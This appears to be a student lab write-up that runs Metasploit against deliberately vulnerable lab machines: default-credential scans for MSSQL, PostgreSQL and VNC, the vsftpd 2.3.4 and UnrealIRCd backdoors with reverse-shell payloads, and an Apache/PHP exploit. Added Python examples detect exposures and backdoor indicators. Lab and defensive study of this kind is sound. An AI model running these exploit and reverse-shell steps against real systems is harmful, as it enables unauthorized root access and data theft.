# STL 1 Assignment 3
# 2

`nmap -sP 10.0.2.0/24 -T5`

`nmap -Pn 10.0.2.23`
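The two nmap commands above only tell you which hosts answer; what a defender needs from the same scan is which of the exposed services this lab later attacks with default credentials or known backdoors. The following is an added example, not part of the original write-up, that parses nmap's grepable output format (it assumes the scan was re-run as `nmap -sV -oG lab.gnmap 10.0.2.0/24`, which the write-up does not do) and flags those services. The sample output is constructed to resemble the lab network and is not a real capture.

```python
"""Summarise nmap grepable (-oG) output from a defender's point of view."""

# Constructed sample of nmap's grepable output format (not a real capture).
# Field layout per port entry: port/state/proto/owner/service/rpc/version/
SAMPLE_OG = (
    "# Nmap 7.94 scan initiated as: nmap -sV -oG lab.gnmap 10.0.2.0/24\n"
    "Host: 10.0.2.4 ()\tStatus: Up\n"
    "Host: 10.0.2.4 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1/, 80/open/tcp//http//Apache httpd 2.2.8/, "
    "5432/open/tcp//postgresql//PostgreSQL DB 8.3.0/, 5900/open/tcp//vnc//VNC protocol 3.3/, "
    "6667/open/tcp//irc//UnrealIRCd/\tIgnored State: closed (994)\n"
    "Host: 10.0.2.23 ()\tStatus: Up\n"
    "Host: 10.0.2.23 ()\tPorts: 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2005/, "
    "3389/open/tcp//ms-wbt-server///\n"
    "# Nmap done\n"
)

# Services that this write-up shows being attacked with default credentials or
# known backdoors; a defender wants these inventoried and justified.
RISKY_SERVICES = {"ftp", "postgresql", "vnc", "irc", "ms-sql-s"}


def parse_gnmap(text):
    """Return {ip: [ {port, proto, service, version}, ... ]} for open ports."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and scan summary
        fields = line.split("\t")
        ip = fields[0].split()[1]
        hosts.setdefault(ip, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue  # "Status:" and "Ignored State:" fields
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 7 or parts[1] != "open":
                    continue
                hosts[ip].append({
                    "port": int(parts[0]),
                    "proto": parts[2],
                    "service": parts[4],
                    "version": parts[6],
                })
    return hosts


def risky_exposures(hosts):
    """List (ip, port, service, version) for services in RISKY_SERVICES, sorted."""
    findings = []
    for ip, ports in hosts.items():
        for p in ports:
            if p["service"] in RISKY_SERVICES:
                findings.append((ip, p["port"], p["service"], p["version"]))
    return sorted(findings)


if __name__ == "__main__":
    for ip, port, service, version in risky_exposures(parse_gnmap(SAMPLE_OG)):
        print(f"{ip}:{port} {service} {version or '(no version)'}")
```

Run against real output, the list is the set of services that should either be removed from the network, put behind authentication that is not a default password, or patched to a version without the backdoor.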
# 3

`auxiliary/scanner/mssql/mssql_login`


After running the `ls` command:



`show payloads`

`search reverse_tcp`

`payload/windows/shell/reverse_tcp` (this is the one I used). Since this is a plain reverse shell rather than Meterpreter, I am able to run Windows-specific commands, as seen in the following:

`dir`
Linux commands do not work, as seen in the following:

# 5
## 5.1


The IP address of the Ubuntu machine is 10.0.2.4, and the open ports are shown below. Options available:

Using `use auxiliary/scanner/postgres/postgres_login` to check for default credentials, then running it with `run postgres://10.0.2.4`, the following is found:

`show options` shows the default password list that Metasploit already ships (the file is `postgres_default_pass.txt`):

The details of the default password list can be found in the following:

There are 4 rows in the file.
To exploit using the information that we have, the following are run:
`search postgres_payload`

We will be using the Linux version, which is selected by running the following command:
`use exploit/linux/postgres/postgres_payload`

Running `exploit` then drops us into Meterpreter (an interactive session on the target machine):

Running the `pwd; cat /etc/passwd; getuid; getpid` commands

## 5.2

To make sure that the exploit is applicable, we check whether the FTP port (21) is open, which in our case it is.
To search for the vsftpd exploit, the `search vsftpd` command is run:

`use exploit/unix/ftp/vsftpd_234_backdoor` is run

We need to set the target IP to 10.0.2.4 and then exploit by running the following commands:
`set RHOSTS 10.0.2.4`
`exploit`
The necessary commands `whoami`, `pwd`, `env` were run as well:

-------------------
#### Manual Exploit
Reference:
- https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
- https://www.hackingtutorials.org/metasploit-tutorials/exploiting-vsftpd-metasploitable/
vsftpd v2.3.4 contains a backdoor that was added by an intruder to the distributed source archive. To trigger the backdoor, the username must contain the characters `:)`; the password can be anything:

Based on the reference I used `user:)` as the username and `pass` as the password.
Before using telnet to open a connection, port 6200 is closed, as seen in the following:
`nmap -sS -p 6200 10.0.2.4`

After using telnet to open a connection to port 21 and logging in with that username, port 6200 is now open, as seen:

Now that port 6200 is open, we can telnet to it and obtain a root shell, as seen:

To run commands in this shell, we need to append `;` to each command.
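Seen from the FTP server's side, the manual exploit above leaves two indicators: a login attempt whose username contains `:)`, and a listener appearing on TCP 6200 on a host that should only be serving FTP. The following is an added example, not part of the original write-up, that checks for both: it scans vsftpd-style log lines for the trigger string and probes whether a given port is accepting connections. The log lines are constructed (the format is approximated, not copied from a real vsftpd log), and the port probe is demonstrated against a local listener so it runs offline.

```python
"""Defender-side checks for the vsftpd 2.3.4 backdoor indicators."""
import re
import socket

# Constructed vsftpd-style log lines (format approximated; not a real capture).
SAMPLE_LOG = """\
Mon May  2 10:15:01 2022 [pid 2151] CONNECT: Client "10.0.2.15"
Mon May  2 10:15:03 2022 [pid 2150] [alice] OK LOGIN: Client "10.0.2.20"
Mon May  2 10:15:09 2022 [pid 2151] [user:)] FAIL LOGIN: Client "10.0.2.15"
Mon May  2 10:16:40 2022 [pid 2160] [anonymous] OK LOGIN: Client "10.0.2.21"
"""

# Matches the "[username] OK|FAIL LOGIN: Client "ip"" part of a login line.
LOGIN_RE = re.compile(
    r'\[(?P<user>[^\]]*)\]\s+(?:OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)
BACKDOOR_TRIGGER = ":)"   # substring in the username that arms the backdoor
BACKDOOR_PORT = 6200      # port the armed backdoor listens on


def find_backdoor_logins(log_text):
    """Return one dict per login attempt whose username contains the trigger."""
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m and BACKDOOR_TRIGGER in m.group("user"):
            hits.append({"user": m.group("user"),
                         "client": m.group("client"),
                         "line": line})
    return hits


def tcp_port_listening(host, port, timeout=1.0):
    """True if a TCP connect to host:port succeeds within timeout, else False."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:  # refused, timed out, unreachable
            return False


def open_local_listener(port=0):
    """Helper for the offline demo: a throwaway listener on 127.0.0.1.

    Returns (server_socket, bound_port); port=0 lets the OS pick a free port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    for hit in find_backdoor_logins(SAMPLE_LOG):
        print(f"backdoor trigger from {hit['client']} as user {hit['user']!r}")

    # Offline demo of the port probe; on a real FTP host you would probe
    # (host, BACKDOOR_PORT) and alert if it ever returns True.
    srv, port = open_local_listener()
    print(f"127.0.0.1:{port} listening:", tcp_port_listening("127.0.0.1", port))
    srv.close()
    print(f"127.0.0.1:{port} listening:", tcp_port_listening("127.0.0.1", port))
```

Either indicator alone is enough to act on: the log match shows someone sent the trigger, and a listener on 6200 shows it worked. The fix is to upgrade vsftpd to a release without the backdoored archive and to restrict who can reach port 21 at all.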
## 5.3
To run the IRC daemon exploit, we first need to make sure that port 6667 is open as seen:

`search irc`

`use exploit/unix/irc/unreal_ircd_3281_backdoor`

`set RHOSTS 10.0.2.4`
To run the exploit we must first choose a payload; to see what payloads are available:
`show payloads`

Since we want to have a reverse shell the payload we are using would be: `payload/cmd/unix/reverse`
`set payload payload/cmd/unix/reverse`

Now that the payload is set, we need to make sure that LHOST is set properly (RHOSTS was set earlier):
`set LHOST 10.0.2.15`

Run `exploit` to start the exploitation:

As `whoami` shows, I now have root access.
## 5.4 a
Chosen Exploit: vnc_login


For vnc_login, port 5900 should be open. The following commands set up the module:
`search vnc_login`
`use auxiliary/scanner/vnc/vnc_login`
`show options`

`set RHOSTS 10.0.2.4`
`exploit`

Now that the scan has succeeded and the password `password` has been found, we can test whether it works. vncviewer is installed by default in Kali, so the following command is run:
`vncviewer 10.0.2.4`


We can see that we have root access to this machine through vnc.
## 5.4 b
Chosen Exploit: Apache/PHP 5.2.4 (port 80):
https://medium.com/hacker-toolbelt/metasploitable-2-iv-port-80-5b90a0a22cb6

Based on `10.0.2.4/phpinfo.php`. To make sure the vulnerability is applicable, port 80 must be open; the following screenshot shows that it is:


To find the PHP version, the following commands are run:
`search http_version`
`use auxiliary/scanner/http/http_version`

To run the module, the following commands are run:
`set RHOSTS 10.0.2.4`
`exploit`
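What `http_version` reports comes straight from the `Server` and `X-Powered-By` response headers, and it is that disclosed version string that the later `searchsploit` lookup keys on. The following is an added example, not part of the original write-up, that extracts product/version pairs from a raw HTTP response head and shows the difference between a leaky server and one configured with Apache's `ServerTokens Prod` and PHP's `expose_php = Off`. Both responses are constructed; the version numbers are chosen to resemble the lab target but are not captured from it.

```python
"""Detect server/PHP version disclosure in HTTP response headers."""
import re

# Constructed response head from a server that discloses versions (not a real capture).
LEAKY_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 02 May 2022 10:20:00 GMT\r\n"
    "Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
    "X-Powered-By: PHP/5.2.4-2ubuntu5.10\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed response head from the same server after `ServerTokens Prod`
# (Apache) and `expose_php = Off` (php.ini).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# product/version, where version has at least one dot (so "DAV/2" is not counted).
VERSION_RE = re.compile(r"([A-Za-z][\w.-]*)/(\d+(?:\.\d+)+)")
DISCLOSING_HEADERS = ("server", "x-powered-by")


def parse_headers(raw):
    """Return {lowercased-name: value} for the headers of a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def disclosed_versions(raw):
    """List (header, product, version) for every version string in DISCLOSING_HEADERS."""
    headers = parse_headers(raw)
    found = []
    for name in DISCLOSING_HEADERS:
        for product, version in VERSION_RE.findall(headers.get(name, "")):
            found.append((name, product, version))
    return found


if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, disclosed_versions(raw) or "no versions disclosed")
```

Hiding the version does not patch anything; it only removes the free hint. The real fix for a host running this old Apache/PHP pair is to update it.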

More information about the server:
`use auxiliary/scanner/http/dir_scanner`

`use auxiliary/scanner/http/verb_auth_bypass`

We search `searchsploit` for a matching exploit using the following command:
`searchsploit apache | grep 5.2.4`

Once found, we select the corresponding module in Metasploit and `set RHOSTS 10.0.2.4`:


The following screenshot, taken after `exploit` is run, confirms that we have gained access to the victim machine:

The results of the commands `pwd`, `env`, `whoami`, and `ls` can be seen in the screenshot above.